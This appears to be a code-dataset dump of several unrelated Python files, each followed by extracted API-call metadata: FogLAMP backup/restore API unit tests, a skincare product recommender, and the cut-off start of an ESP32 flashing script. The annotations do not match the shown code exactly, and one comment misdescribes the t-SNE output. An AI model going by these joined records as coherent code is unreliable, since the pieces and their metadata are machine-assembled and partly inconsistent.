assert 200 == resp.status
result = await resp.text()
json_response = json.loads(result)
assert 1 == len(json_response['backups'])
assert Counter({"id", "date", "status"}) == Counter(json_response['backups'][0].keys())
@pytest.mark.parametrize("request_params, response_code, response_message", [
('?limit=invalid', 400, "Limit must be a positive integer"),
('?limit=-1', 400, "Limit must be a positive integer"),
('?skip=invalid', 400, "Skip/Offset must be a positive integer"),
('?skip=-1', 400, "Skip/Offset must be a positive integer"),
('?status=BLA', 400, "'BLA' is not a valid status")
])
async def test_get_backups_bad_data(self, client, request_params, response_code, response_message):
resp = await client.get('/foglamp/backup{}'.format(request_params))
assert response_code == resp.status
assert response_message == resp.reason
async def test_get_backups_exceptions(self, client):
with patch.object(connect, 'get_storage_async', return_value=Exception):
resp = await client.get('/foglamp/backup')
assert 500 == resp.status
assert "Internal Server Error" == resp.reason
async def test_create_backup(self, client):
async def mock_create():
return "running_or_failed"
storage_client_mock = MagicMock(StorageClientAsync)
with patch.object(connect, 'get_storage_async', return_value=storage_client_mock):
with patch.object(Backup, 'create_backup', return_value=mock_create()):
resp = await client.post('/foglamp/backup')
assert 200 == resp.status
assert '{"status": "running_or_failed"}' == await resp.text()
async def test_create_backup_exception(self, client):
with patch.object(connect, 'get_storage_async', return_value=Exception):
with patch.object(Backup, 'create_backup', return_value=Exception):
resp = await client.post('/foglamp/backup')
assert 500 == resp.status
assert "Internal Server Error" == resp.reason
async def test_get_backup_details(self, client):
storage_client_mock = MagicMock(StorageClientAsync)
response = {'id': 1, 'file_name': '1.dump', 'ts': '2018-02-15 15:18:41.821978+05:30',
'status': '2', 'type': '1', 'exit_code': '0'}
with patch.object(connect, 'get_storage_async', return_value=storage_client_mock):
with patch.object(Backup, 'get_backup_details', return_value=mock_coro(response)):
resp = await client.get('/foglamp/backup/{}'.format(1))
assert 200 == resp.status
result = await resp.text()
json_response = json.loads(result)
assert 3 == len(json_response)
assert Counter({"id", "date", "status"}) == Counter(json_response.keys())
@pytest.mark.parametrize("input_exception, response_code, response_message", [
(exceptions.DoesNotExist, 404, "Backup id 8 does not exist"),
(Exception, 500, "Internal Server Error")
])
async def test_get_backup_details_exceptions(self, client, input_exception, response_code, response_message):
storage_client_mock = MagicMock(StorageClientAsync)
with patch.object(connect, 'get_storage_async', return_value=storage_client_mock):
with patch.object(Backup, 'get_backup_details', side_effect=input_exception):
resp = await client.get('/foglamp/backup/{}'.format(8))
assert response_code == resp.status
assert response_message == resp.reason
async def test_get_backup_details_bad_data(self, client):
resp = await client.get('/foglamp/backup/{}'.format('BLA'))
assert 400 == resp.status
assert "Invalid backup id" == resp.reason
async def test_delete_backup(self, client):
storage_client_mock = MagicMock(StorageClientAsync)
with patch.object(connect, 'get_storage_async', return_value=storage_client_mock):
with patch.object(Backup, 'delete_backup', return_value=mock_coro(None)):
resp = await client.delete('/foglamp/backup/{}'.format(1))
assert 200 == resp.status
result = await resp.text()
json_response = json.loads(result)
assert {'message': 'Backup deleted successfully'} == json_response
@pytest.mark.parametrize("input_exception, response_code, response_message", [
(exceptions.DoesNotExist, 404, "Backup id 8 does not exist"),
(Exception, 500, "Internal Server Error")
])
async def test_delete_backup_exceptions(self, client, input_exception, response_code, response_message):
storage_client_mock = MagicMock(StorageClientAsync)
with patch.object(connect, 'get_storage_async', return_value=storage_client_mock):
with patch.object(Backup, 'delete_backup', side_effect=input_exception):
resp = await client.delete('/foglamp/backup/{}'.format(8))
assert response_code == resp.status
assert response_message == resp.reason
async def test_delete_backup_bad_data(self, client):
resp = await client.delete('/foglamp/backup/{}'.format('BLA'))
assert 400 == resp.status
assert "Invalid backup id" == resp.reason
async def test_get_backup_status(self, client):
resp = await client.get('/foglamp/backup/status')
assert 200 == resp.status
result = await resp.text()
json_response = json.loads(result)
assert {'backupStatus': [{'index': 1, 'name': 'RUNNING'},
{'index': 2, 'name': 'COMPLETED'},
{'index': 3, 'name': 'CANCELED'},
{'index': 4, 'name': 'INTERRUPTED'},
{'index': 5, 'name': 'FAILED'},
{'index': 6, 'name': 'RESTORED'}]} == json_response
@pytest.mark.parametrize("input_exception, response_code, response_message", [
(ValueError, 400, "Invalid backup id"),
(exceptions.DoesNotExist, 404, "Backup id 8 does not exist"),
(Exception, 500, "Internal Server Error")
])
async def test_get_backup_download_exceptions(self, client, input_exception, response_code, response_message):
storage_client_mock = MagicMock(StorageClientAsync)
with patch.object(connect, 'get_storage_async', return_value=storage_client_mock):
with patch.object(Backup, 'get_backup_details', side_effect=input_exception):
resp = await client.get('/foglamp/backup/{}/download'.format(8))
assert response_code == resp.status
assert response_message == resp.reason
async def test_get_backup_download(self, client):
storage_client_mock = MagicMock(StorageClientAsync)
response = {'id': 1, 'file_name': '/usr/local/foglamp/data/backup/foglamp.db', 'ts': '2018-02-15 15:18:41',
'status': '2', 'type': '1'}
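        # patch FileResponse so the download handler streams this test file instead of a real backup archive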
with patch("aiohttp.web.FileResponse", return_value=web.FileResponse(path=os.path.realpath(__file__))) as file_res:
with patch.object(connect, 'get_storage_async', return_value=storage_client_mock):
with patch.object(Backup, 'get_backup_details', return_value=mock_coro(response)) as patch_backup_detail:
with patch('tarfile.open'):
resp = await client.get('/foglamp/backup/{}/download'.format(1))
assert 200 == resp.status
assert 'OK' == resp.reason
patch_backup_detail.assert_called_once_with(1)
assert 1 == file_res.call_count
@pytest.allure.feature("unit")
@pytest.allure.story("api", "restore")
class TestRestore:
"""Unit test the Restore functionality"""
@pytest.fixture
def client(self, loop, test_client):
app = web.Application(loop=loop)
# fill the routes table
routes.setup(app)
return loop.run_until_complete(test_client(app))
async def test_restore_backup(self, client):
async def mock_restore():
return "running"
storage_client_mock = MagicMock(StorageClientAsync)
with patch.object(connect, 'get_storage_async', return_value=storage_client_mock):
with patch.object(Restore, 'restore_backup', return_value=mock_restore()):
resp = await client.put('/foglamp/backup/{}/restore'.format(1))
assert 200 == resp.status
r = await resp.text()
assert {'status': 'running'} == json.loads(r)
@pytest.mark.parametrize("backup_id, input_exception, code, message", [
(8, exceptions.DoesNotExist, 404, "Backup with 8 does not exist"),
(2, Exception, 500, "Internal Server Error"),
('blah', ValueError, 400, 'Invalid backup id')
])
async def test_restore_backup_exceptions(self, client, backup_id, input_exception, code, message):
storage_client_mock = MagicMock(StorageClientAsync)
with patch.object(connect, 'get_storage_async', return_value=storage_client_mock):
with patch.object(Restore, 'restore_backup', side_effect=input_exception):
resp = await client.put('/foglamp/backup/{}/restore'.format(backup_id))
assert code == resp.status
assert message == resp.reason
| [
"json.loads",
"pytest.allure.feature",
"unittest.mock.MagicMock",
"aiohttp.web.Application",
"foglamp.services.core.api.backup_restore._get_status",
"pytest.allure.story",
"collections.Counter",
"pytest.mark.parametrize",
"os.path.realpath",
"unittest.mock.patch.object",
"foglamp.services.core.routes.setup",
"unittest.mock.patch"
]
| [((885, 914), 'pytest.allure.feature', 'pytest.allure.feature', (['"""unit"""'], {}), "('unit')\n", (906, 914), False, 'import pytest\n'), ((916, 952), 'pytest.allure.story', 'pytest.allure.story', (['"""api"""', '"""backup"""'], {}), "('api', 'backup')\n", (935, 952), False, 'import pytest\n'), ((10456, 10485), 'pytest.allure.feature', 'pytest.allure.feature', (['"""unit"""'], {}), "('unit')\n", (10477, 10485), False, 'import pytest\n'), ((10487, 10524), 'pytest.allure.story', 'pytest.allure.story', (['"""api"""', '"""restore"""'], {}), "('api', 'restore')\n", (10506, 10524), False, 'import pytest\n'), ((1244, 1420), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""input_data, expected"""', "[(1, 'RUNNING'), (2, 'COMPLETED'), (3, 'CANCELED'), (4, 'INTERRUPTED'), (5,\n 'FAILED'), (6, 'RESTORED'), (7, 'UNKNOWN')]"], {}), "('input_data, expected', [(1, 'RUNNING'), (2,\n 'COMPLETED'), (3, 'CANCELED'), (4, 'INTERRUPTED'), (5, 'FAILED'), (6,\n 'RESTORED'), (7, 'UNKNOWN')])\n", (1267, 1420), False, 'import pytest\n'), ((1600, 1873), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""request_params"""', "['', '?limit=1', '?skip=1', '?status=completed', '?status=failed',\n '?status=restored&skip=10', '?status=running&limit=1',\n '?status=canceled&limit=10&skip=0', '?status=interrupted&limit=&skip=',\n '?status=&limit=&skip=']"], {}), "('request_params', ['', '?limit=1', '?skip=1',\n '?status=completed', '?status=failed', '?status=restored&skip=10',\n '?status=running&limit=1', '?status=canceled&limit=10&skip=0',\n '?status=interrupted&limit=&skip=', '?status=&limit=&skip='])\n", (1623, 1873), False, 'import pytest\n'), ((2846, 3240), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""request_params, response_code, response_message"""', '[(\'?limit=invalid\', 400, \'Limit must be a positive integer\'), (\'?limit=-1\',\n 400, \'Limit must be a positive integer\'), (\'?skip=invalid\', 400,\n \'Skip/Offset must be a positive integer\'), (\'?skip=-1\', 400,\n \'Skip/Offset must be a positive integer\'), (\'?status=BLA\', 400,\n "\'BLA\' is not a valid status")]'], {}), '(\'request_params, response_code, response_message\',\n [(\'?limit=invalid\', 400, \'Limit must be a positive integer\'), (\n \'?limit=-1\', 400, \'Limit must be a positive integer\'), (\'?skip=invalid\',\n 400, \'Skip/Offset must be a positive integer\'), (\'?skip=-1\', 400,\n \'Skip/Offset must be a positive integer\'), (\'?status=BLA\', 400,\n "\'BLA\' is not a valid status")])\n', (2869, 3240), False, 'import pytest\n'), ((5559, 5750), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""input_exception, response_code, response_message"""', "[(exceptions.DoesNotExist, 404, 'Backup id 8 does not exist'), (Exception, \n 500, 'Internal Server Error')]"], {}), "('input_exception, response_code, response_message',\n [(exceptions.DoesNotExist, 404, 'Backup id 8 does not exist'), (\n Exception, 500, 'Internal Server Error')])\n", (5582, 5750), False, 'import pytest\n'), ((7099, 7290), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""input_exception, response_code, response_message"""', "[(exceptions.DoesNotExist, 404, 'Backup id 8 does not exist'), (Exception, \n 500, 'Internal Server Error')]"], {}), "('input_exception, response_code, response_message',\n [(exceptions.DoesNotExist, 404, 'Backup id 8 does not exist'), (\n Exception, 500, 'Internal Server Error')])\n", (7122, 7290), False, 'import pytest\n'), ((8694, 8924), 'pytest.mark.parametrize', 'pytest.mark.parametrize', 
(['"""input_exception, response_code, response_message"""', "[(ValueError, 400, 'Invalid backup id'), (exceptions.DoesNotExist, 404,\n 'Backup id 8 does not exist'), (Exception, 500, 'Internal Server Error')]"], {}), "('input_exception, response_code, response_message',\n [(ValueError, 400, 'Invalid backup id'), (exceptions.DoesNotExist, 404,\n 'Backup id 8 does not exist'), (Exception, 500, 'Internal Server Error')])\n", (8717, 8924), False, 'import pytest\n'), ((11388, 11631), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""backup_id, input_exception, code, message"""', "[(8, exceptions.DoesNotExist, 404, 'Backup with 8 does not exist'), (2,\n Exception, 500, 'Internal Server Error'), ('blah', ValueError, 400,\n 'Invalid backup id')]"], {}), "('backup_id, input_exception, code, message', [(8,\n exceptions.DoesNotExist, 404, 'Backup with 8 does not exist'), (2,\n Exception, 500, 'Internal Server Error'), ('blah', ValueError, 400,\n 'Invalid backup id')])\n", (11411, 11631), False, 'import pytest\n'), ((1096, 1122), 'aiohttp.web.Application', 'web.Application', ([], {'loop': 'loop'}), '(loop=loop)\n', (1111, 1122), False, 'from aiohttp import web\n'), ((1163, 1180), 'foglamp.services.core.routes.setup', 'routes.setup', (['app'], {}), '(app)\n', (1175, 1180), False, 'from foglamp.services.core import routes\n'), ((2040, 2069), 'unittest.mock.MagicMock', 'MagicMock', (['StorageClientAsync'], {}), '(StorageClientAsync)\n', (2049, 2069), False, 'from unittest.mock import MagicMock, patch\n'), ((3979, 4008), 'unittest.mock.MagicMock', 'MagicMock', (['StorageClientAsync'], {}), '(StorageClientAsync)\n', (3988, 4008), False, 'from unittest.mock import MagicMock, patch\n'), ((4832, 4861), 'unittest.mock.MagicMock', 'MagicMock', (['StorageClientAsync'], {}), '(StorageClientAsync)\n', (4841, 4861), False, 'from unittest.mock import MagicMock, patch\n'), ((5908, 5937), 'unittest.mock.MagicMock', 'MagicMock', (['StorageClientAsync'], {}), '(StorageClientAsync)\n', (5917, 5937), False, 'from unittest.mock import MagicMock, patch\n'), ((6592, 6621), 'unittest.mock.MagicMock', 'MagicMock', (['StorageClientAsync'], {}), '(StorageClientAsync)\n', (6601, 6621), False, 'from unittest.mock import MagicMock, patch\n'), ((7443, 7472), 'unittest.mock.MagicMock', 'MagicMock', (['StorageClientAsync'], {}), '(StorageClientAsync)\n', (7452, 7472), False, 'from unittest.mock import MagicMock, patch\n'), ((8248, 8266), 'json.loads', 'json.loads', (['result'], {}), '(result)\n', (8258, 8266), False, 'import json\n'), ((9092, 9121), 'unittest.mock.MagicMock', 'MagicMock', (['StorageClientAsync'], {}), '(StorageClientAsync)\n', (9101, 9121), False, 'from unittest.mock import MagicMock, patch\n'), ((9576, 9605), 'unittest.mock.MagicMock', 'MagicMock', (['StorageClientAsync'], {}), '(StorageClientAsync)\n', (9585, 9605), False, 'from unittest.mock import MagicMock, patch\n'), ((10666, 10692), 'aiohttp.web.Application', 'web.Application', ([], {'loop': 'loop'}), '(loop=loop)\n', (10681, 10692), False, 'from aiohttp import web\n'), ((10733, 10750), 'foglamp.services.core.routes.setup', 'routes.setup', (['app'], {}), '(app)\n', (10745, 10750), False, 'from foglamp.services.core import routes\n'), ((10952, 10981), 'unittest.mock.MagicMock', 'MagicMock', (['StorageClientAsync'], {}), '(StorageClientAsync)\n', (10961, 10981), False, 'from unittest.mock import MagicMock, patch\n'), ((11783, 11812), 'unittest.mock.MagicMock', 'MagicMock', (['StorageClientAsync'], {}), '(StorageClientAsync)\n', (11792, 11812), False, 
'from unittest.mock import MagicMock, patch\n'), ((1555, 1593), 'foglamp.services.core.api.backup_restore._get_status', 'backup_restore._get_status', (['input_data'], {}), '(input_data)\n', (1581, 1593), False, 'from foglamp.services.core.api import backup_restore\n'), ((2288, 2364), 'unittest.mock.patch.object', 'patch.object', (['connect', '"""get_storage_async"""'], {'return_value': 'storage_client_mock'}), "(connect, 'get_storage_async', return_value=storage_client_mock)\n", (2300, 2364), False, 'from unittest.mock import MagicMock, patch\n'), ((3608, 3674), 'unittest.mock.patch.object', 'patch.object', (['connect', '"""get_storage_async"""'], {'return_value': 'Exception'}), "(connect, 'get_storage_async', return_value=Exception)\n", (3620, 3674), False, 'from unittest.mock import MagicMock, patch\n'), ((4022, 4098), 'unittest.mock.patch.object', 'patch.object', (['connect', '"""get_storage_async"""'], {'return_value': 'storage_client_mock'}), "(connect, 'get_storage_async', return_value=storage_client_mock)\n", (4034, 4098), False, 'from unittest.mock import MagicMock, patch\n'), ((4436, 4502), 'unittest.mock.patch.object', 'patch.object', (['connect', '"""get_storage_async"""'], {'return_value': 'Exception'}), "(connect, 'get_storage_async', return_value=Exception)\n", (4448, 4502), False, 'from unittest.mock import MagicMock, patch\n'), ((5035, 5111), 'unittest.mock.patch.object', 'patch.object', (['connect', '"""get_storage_async"""'], {'return_value': 'storage_client_mock'}), "(connect, 'get_storage_async', return_value=storage_client_mock)\n", (5047, 5111), False, 'from unittest.mock import MagicMock, patch\n'), ((5951, 6027), 'unittest.mock.patch.object', 'patch.object', (['connect', '"""get_storage_async"""'], {'return_value': 'storage_client_mock'}), "(connect, 'get_storage_async', return_value=storage_client_mock)\n", (5963, 6027), False, 'from unittest.mock import MagicMock, patch\n'), ((6635, 6711), 'unittest.mock.patch.object', 'patch.object', (['connect', '"""get_storage_async"""'], {'return_value': 'storage_client_mock'}), "(connect, 'get_storage_async', return_value=storage_client_mock)\n", (6647, 6711), False, 'from unittest.mock import MagicMock, patch\n'), ((7486, 7562), 'unittest.mock.patch.object', 'patch.object', (['connect', '"""get_storage_async"""'], {'return_value': 'storage_client_mock'}), "(connect, 'get_storage_async', return_value=storage_client_mock)\n", (7498, 7562), False, 'from unittest.mock import MagicMock, patch\n'), ((9135, 9211), 'unittest.mock.patch.object', 'patch.object', (['connect', '"""get_storage_async"""'], {'return_value': 'storage_client_mock'}), "(connect, 'get_storage_async', return_value=storage_client_mock)\n", (9147, 9211), False, 'from unittest.mock import MagicMock, patch\n'), ((10995, 11071), 'unittest.mock.patch.object', 'patch.object', (['connect', '"""get_storage_async"""'], {'return_value': 'storage_client_mock'}), "(connect, 'get_storage_async', return_value=storage_client_mock)\n", (11007, 11071), False, 'from unittest.mock import MagicMock, patch\n'), ((11826, 11902), 'unittest.mock.patch.object', 'patch.object', (['connect', '"""get_storage_async"""'], {'return_value': 'storage_client_mock'}), "(connect, 'get_storage_async', return_value=storage_client_mock)\n", (11838, 11902), False, 'from unittest.mock import MagicMock, patch\n'), ((2659, 2677), 'json.loads', 'json.loads', (['result'], {}), '(result)\n', (2669, 2677), False, 'import json\n'), ((4521, 4582), 'unittest.mock.patch.object', 'patch.object', (['Backup', 
'"""create_backup"""'], {'return_value': 'Exception'}), "(Backup, 'create_backup', return_value=Exception)\n", (4533, 4582), False, 'from unittest.mock import MagicMock, patch\n'), ((5397, 5415), 'json.loads', 'json.loads', (['result'], {}), '(result)\n', (5407, 5415), False, 'import json\n'), ((6046, 6117), 'unittest.mock.patch.object', 'patch.object', (['Backup', '"""get_backup_details"""'], {'side_effect': 'input_exception'}), "(Backup, 'get_backup_details', side_effect=input_exception)\n", (6058, 6117), False, 'from unittest.mock import MagicMock, patch\n'), ((6991, 7009), 'json.loads', 'json.loads', (['result'], {}), '(result)\n', (7001, 7009), False, 'import json\n'), ((7581, 7647), 'unittest.mock.patch.object', 'patch.object', (['Backup', '"""delete_backup"""'], {'side_effect': 'input_exception'}), "(Backup, 'delete_backup', side_effect=input_exception)\n", (7593, 7647), False, 'from unittest.mock import MagicMock, patch\n'), ((9230, 9301), 'unittest.mock.patch.object', 'patch.object', (['Backup', '"""get_backup_details"""'], {'side_effect': 'input_exception'}), "(Backup, 'get_backup_details', side_effect=input_exception)\n", (9242, 9301), False, 'from unittest.mock import MagicMock, patch\n'), ((9912, 9988), 'unittest.mock.patch.object', 'patch.object', (['connect', '"""get_storage_async"""'], {'return_value': 'storage_client_mock'}), "(connect, 'get_storage_async', return_value=storage_client_mock)\n", (9924, 9988), False, 'from unittest.mock import MagicMock, patch\n'), ((11921, 11989), 'unittest.mock.patch.object', 'patch.object', (['Restore', '"""restore_backup"""'], {'side_effect': 'input_exception'}), "(Restore, 'restore_backup', side_effect=input_exception)\n", (11933, 11989), False, 'from unittest.mock import MagicMock, patch\n'), ((2759, 2792), 'collections.Counter', 'Counter', (["{'id', 'date', 'status'}"], {}), "({'id', 'date', 'status'})\n", (2766, 2792), False, 'from collections import Counter\n'), ((5486, 5519), 'collections.Counter', 'Counter', (["{'id', 'date', 'status'}"], {}), "({'id', 'date', 'status'})\n", (5493, 5519), False, 'from collections import Counter\n'), ((11368, 11381), 'json.loads', 'json.loads', (['r'], {}), '(r)\n', (11378, 11381), False, 'import json\n'), ((10137, 10158), 'unittest.mock.patch', 'patch', (['"""tarfile.open"""'], {}), "('tarfile.open')\n", (10142, 10158), False, 'from unittest.mock import MagicMock, patch\n'), ((9853, 9879), 'os.path.realpath', 'os.path.realpath', (['__file__'], {}), '(__file__)\n', (9869, 9879), False, 'import os\n')] |
from typing import Dict, List, Union
import json
import os
import re
import numpy as np
import pandas as pd
import streamlit as st
from scipy.sparse.linalg import svds
from scipy.spatial import distance
from sklearn.manifold import TSNE
from sklearn.preprocessing import MultiLabelBinarizer, StandardScaler
def preprocess_ingredients(ingredients):
processed_ingredients = []
for i in range(len(ingredients)):
processed_ingredient = re.sub(
r"\(([^)]*)\)|(([0-9]\d{0,2}(\.\d{1,3})*(,\d+)?)(%|mg|units))|(<\/?i>)|(\/.+)|(\\.+)|\[([^\]]*)\]",
"",
ingredients[i],
).strip()
if (
processed_ingredient.lower() == "water"
or processed_ingredient.lower() == "aqua"
or processed_ingredient.lower() == "eau"
):
processed_ingredient = "Water"
processed_ingredients.append(processed_ingredient)
return processed_ingredients
@st.experimental_memo
def content_recommender(opt, _item1, _item2, _item3, num_recs, df) -> pd.DataFrame:
    content_df = df[df.category == opt].copy()
content_df["ingredients"] = content_df["ingredients"].map(preprocess_ingredients)
mlb = MultiLabelBinarizer()
output = mlb.fit_transform(content_df.ingredients.values)
content_df = content_df.drop(["ingredients"], axis=1)
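    # embed the one-hot ingredient vectors in 2-D with t-SNE so products with
    # similar formulations land close to each other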
model = TSNE(n_components=2, learning_rate=200)
tsne_features = model.fit_transform(output)
content_df["X"] = tsne_features[:, 0]
content_df["Y"] = tsne_features[:, 1]
content_df["dist"] = 0.0
item1 = content_df[content_df["product_name"] == _item1]
item2 = content_df[content_df["product_name"] == _item2]
item3 = content_df[content_df["product_name"] == _item3]
    # 1-D t-SNE coordinates of the three anchor products
    p1 = np.array([item1["X"].values[0], item1["Y"].values[0]])
    p2 = np.array([item2["X"].values[0], item2["Y"].values[0]])
    p3 = np.array([item3["X"].values[0], item3["Y"].values[0]])
    for ind, item in content_df.iterrows():
        pn = np.array([item.X, item.Y])
        content_df.at[ind, "dist"] = min(
            distance.chebyshev(p1, pn),
            distance.chebyshev(p2, pn),
            distance.chebyshev(p3, pn),
        )
    content_df = content_df[~content_df.product_name.isin([_item1, _item2, _item3])]
    content_df = content_df.sort_values("dist")
    return content_df.head(num_recs)
@st.experimental_memo
def collab_recommender(df_tmp, num_recs, username):
reviews = df_tmp.explode("review_data")
reviews["username"] = reviews["review_data"].apply(lambda x: x["UserNickname"])
reviews["rating"] = reviews["review_data"].apply(lambda x: x["Rating"])
grouped_reviews = reviews.groupby("username")["review_data"].apply(list)
multiple_rating_users = set(grouped_reviews[grouped_reviews.map(len) > 1].index)
multi_reviews = reviews[reviews.username.isin(multiple_rating_users)]
products_reviewed_per_user = {u: set() for u in multiple_rating_users}
product_index = dict(zip(df_tmp["url"].values, range(len(df_tmp["url"]))))
username_index = dict(zip(multiple_rating_users, range(len(multiple_rating_users))))
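    # rows: users with more than one review, columns: products, values: star ratings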
matrix = np.zeros((len(multiple_rating_users), len(df_tmp["url"])))
for user, rating, url in zip(
multi_reviews.username.values,
multi_reviews.rating.values,
multi_reviews.url.values,
):
matrix[username_index[user]][product_index[url]] = rating
products_reviewed_per_user[user].add(url)
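    # standardize the ratings, factor the matrix with truncated SVD, then
    # reconstruct it to predict ratings for products each user has not yet reviewed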
ss = StandardScaler()
normatrix = ss.fit_transform(matrix)
U, S, V = svds(normatrix)
all_user_predicted_rating = ss.inverse_transform(U @ np.diag(S) @ V)
preds_df = pd.DataFrame(
all_user_predicted_rating, columns=product_index, index=username_index
)
sorted_user_preds = preds_df.loc[username].sort_values(ascending=False)
sorted_user_preds = sorted_user_preds[
~sorted_user_preds.index.isin(products_reviewed_per_user[username])
]
sorted_user_preds = sorted_user_preds.head(num_recs)
# we want those that they haven't already tested
collab_df = pd.merge(
df_tmp,
sorted_user_preds.to_frame(),
left_on="url",
right_index=True,
how="right",
)
collab_df.rename(columns={username: "pred_rating"}, inplace=True)
return collab_df
if __name__ == "__main__":
file_path = os.path.dirname(__file__)
if file_path != "":
os.chdir(file_path)
products: List[Dict[str, Union[str, List[str]]]] = []
# input data into List
with open("../cbscraper/product_urls_with_reviews.jsonlines", "rb") as f:
unique = set()
lines = f.read().splitlines()
df_inter = pd.DataFrame(lines)
df_inter.columns = ["json_element"]
df_inter["json_element"].apply(json.loads)
df = pd.json_normalize(df_inter["json_element"].apply(json.loads))
# to save myself if i do something dumb and run the scraper without deleting the .jsonlines file
df.drop_duplicates(subset=["url"], inplace=True)
# option: category of product, eg cleanser
categories = set(df.category.values)
# filter data by given option
print("Hello world!")
print("Welcome!")
print(categories)
print("pls enter the category:")
cat = str(input())
display_product_names = df[df.category == cat]
print(display_product_names[["brand", "product_name"]])
print("pls enter your top 3 products indices, separated by a new line")
item1 = int(input())
item2 = int(input())
item3 = int(input())
print("pls enter # of recs:")
num_recs = int(input())
reviews = display_product_names.explode("review_data")
reviews["username"] = reviews["review_data"].apply(lambda x: x["UserNickname"])
grouped_reviews = reviews.groupby("username")["review_data"].apply(list)
multiple_rating_users = set(grouped_reviews[grouped_reviews.map(len) > 1].index)
print(multiple_rating_users)
print("pls enter sephora userid, if you don't have one just enter 'none':")
username = str(input())
if username == "none":
print("your ingredients based recommendations are:")
cbf = content_recommender(
cat,
df.product_name.values[item1],
df.product_name.values[item2],
df.product_name.values[item3],
num_recs,
df,
)
print(cbf[["brand", "product_name", "url", "avg_rating"]])
else:
cbf = content_recommender(
cat,
df.product_name.values[item1],
df.product_name.values[item2],
df.product_name.values[item3],
num_recs + 10,
df,
)
cf = collab_recommender(cbf, num_recs, username)
print("your hybrid recommendations are:")
print(cf[["brand", "product_name", "url", "pred_rating"]])
print("thank u for using this service :)")
| [
"sklearn.manifold.TSNE",
"numpy.diag",
"sklearn.preprocessing.StandardScaler",
"os.path.dirname",
"os.chdir",
"numpy.array",
"scipy.sparse.linalg.svds",
"scipy.spatial.distance.chebyshev",
"pandas.DataFrame",
"re.sub",
"sklearn.preprocessing.MultiLabelBinarizer"
]
| [((1288, 1309), 'sklearn.preprocessing.MultiLabelBinarizer', 'MultiLabelBinarizer', ([], {}), '()\n', (1307, 1309), False, 'from sklearn.preprocessing import MultiLabelBinarizer\n'), ((1442, 1481), 'sklearn.manifold.TSNE', 'TSNE', ([], {'n_components': '(2)', 'learning_rate': '(200)'}), '(n_components=2, learning_rate=200)\n', (1446, 1481), False, 'from sklearn.manifold import TSNE\n'), ((3533, 3549), 'sklearn.preprocessing.StandardScaler', 'StandardScaler', ([], {}), '()\n', (3547, 3549), False, 'from sklearn.preprocessing import StandardScaler\n'), ((3626, 3641), 'scipy.sparse.linalg.svds', 'svds', (['normatrix'], {}), '(normatrix)\n', (3630, 3641), False, 'from scipy.sparse.linalg import svds\n'), ((3731, 3820), 'pandas.DataFrame', 'pd.DataFrame', (['all_user_predicted_rating'], {'columns': 'product_index', 'index': 'username_index'}), '(all_user_predicted_rating, columns=product_index, index=\n username_index)\n', (3743, 3820), True, 'import pandas as pd\n'), ((4434, 4459), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (4449, 4459), False, 'import os\n'), ((4492, 4511), 'os.chdir', 'os.chdir', (['file_path'], {}), '(file_path)\n', (4500, 4511), False, 'import os\n'), ((4756, 4775), 'pandas.DataFrame', 'pd.DataFrame', (['lines'], {}), '(lines)\n', (4768, 4775), True, 'import pandas as pd\n'), ((1838, 1872), 'numpy.array', 'np.array', (["[item1['X'], item1['Y']]"], {}), "([item1['X'], item1['Y']])\n", (1846, 1872), True, 'import numpy as np\n'), ((1897, 1931), 'numpy.array', 'np.array', (["[item2['X'], item2['Y']]"], {}), "([item2['X'], item2['Y']])\n", (1905, 1931), True, 'import numpy as np\n'), ((1956, 1990), 'numpy.array', 'np.array', (["[item3['X'], item3['Y']]"], {}), "([item3['X'], item3['Y']])\n", (1964, 1990), True, 'import numpy as np\n'), ((2152, 2178), 'scipy.spatial.distance.chebyshev', 'distance.chebyshev', (['p1', 'pn'], {}), '(p1, pn)\n', (2170, 2178), False, 'from scipy.spatial import distance\n'), ((2192, 2218), 'scipy.spatial.distance.chebyshev', 'distance.chebyshev', (['p2', 'pn'], {}), '(p2, pn)\n', (2210, 2218), False, 'from scipy.spatial import distance\n'), ((2232, 2258), 'scipy.spatial.distance.chebyshev', 'distance.chebyshev', (['p3', 'pn'], {}), '(p3, pn)\n', (2250, 2258), False, 'from scipy.spatial import distance\n'), ((554, 702), 're.sub', 're.sub', (['"""\\\\(([^)]*)\\\\)|(([0-9]\\\\d{0,2}(\\\\.\\\\d{1,3})*(,\\\\d+)?)(%|mg|units))|(<\\\\/?i>)|(\\\\/.+)|(\\\\\\\\.+)|\\\\[([^\\\\]]*)\\\\]"""', '""""""', 'ingredients[i]'], {}), "(\n '\\\\(([^)]*)\\\\)|(([0-9]\\\\d{0,2}(\\\\.\\\\d{1,3})*(,\\\\d+)?)(%|mg|units))|(<\\\\/?i>)|(\\\\/.+)|(\\\\\\\\.+)|\\\\[([^\\\\]]*)\\\\]'\n , '', ingredients[i])\n", (560, 702), False, 'import re\n'), ((2064, 2090), 'numpy.array', 'np.array', (['[item.X, item.Y]'], {}), '([item.X, item.Y])\n', (2072, 2090), True, 'import numpy as np\n'), ((3699, 3709), 'numpy.diag', 'np.diag', (['S'], {}), '(S)\n', (3706, 3709), True, 'import numpy as np\n')] |
#!/usr/bin/env python
#
# Copyright (c) 2018, Pycom Limited.
#
# This software is licensed under the GNU GPL version 3 or any
# later version, with permitted additional terms. For more information
# see the Pycom Licence v1.0 document supplied with this file, or
# available at https://www.pycom.io/opensource/licensing
#
"""
Flash the ESP32 (bootloader, partitions table and factory app).
How to call esptool:
python esptool.py '--chip', 'esp32', '--port', /dev/ttyUSB0, '--baud', '921600', 'write_flash', '-z', '--flash_mode', 'dio', '--flash_freq', '40m', '--flash_size', 'detect', '0x1000', bootloader.bin, '0x8000', partitions.bin, '0x10000', application.bin, '0x3FF000', 'config_no_wifi.bin'
"""
from esptool import ESP32ROM
import os
import sys
import struct
import sqlite3
import argparse
import subprocess
import threading
import time
import fw_version
import csv
working_threads = {}
macs_db = None
wmacs = {}
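# each worker thread flags failure by resetting working_threads[port] to None;
# the DB_MAC_* constants track the provisioning state of a MAC address in the database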
DB_MAC_UNUSED = 0
DB_MAC_ERROR = -1
DB_MAC_LOCK = -2
DB_MAC_OK = 1
def open_macs_db(db_filename):
global macs_db
if not os.path.exists(db_filename):
print("MAC addresses database not found")
sys.exit(1)
macs_db = sqlite3.connect(db_filename)
def fetch_MACs(number):
